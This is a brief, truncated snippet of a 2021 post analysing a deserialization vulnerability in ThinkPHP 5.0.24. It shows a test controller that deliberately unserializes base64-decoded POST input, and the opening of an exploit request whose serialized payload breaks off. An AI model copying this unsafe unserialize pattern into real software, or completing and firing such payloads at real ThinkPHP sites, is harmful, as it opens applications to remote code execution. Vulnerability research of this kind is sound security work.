ThinkPHP5.0.24_ Analysis of deserialization vulnerability in Linux

ThinkPHP5.0.24_ Analysis of deserialization vulnerability in Linux ThinkPHP5.0.24Vulnerability code<?php namespace app\index\controller; class Index { public function test01(){ $code = $_POST['code']; unserialize(base64_decode($code)); } } payload/index.php/index/index/test01 POST code=TzoyNzoidGhpbmtccHJvY2Vzc1xwa ...

Posted by trevorturtle on Mon, 22 Nov 2021 06:40:53 +0100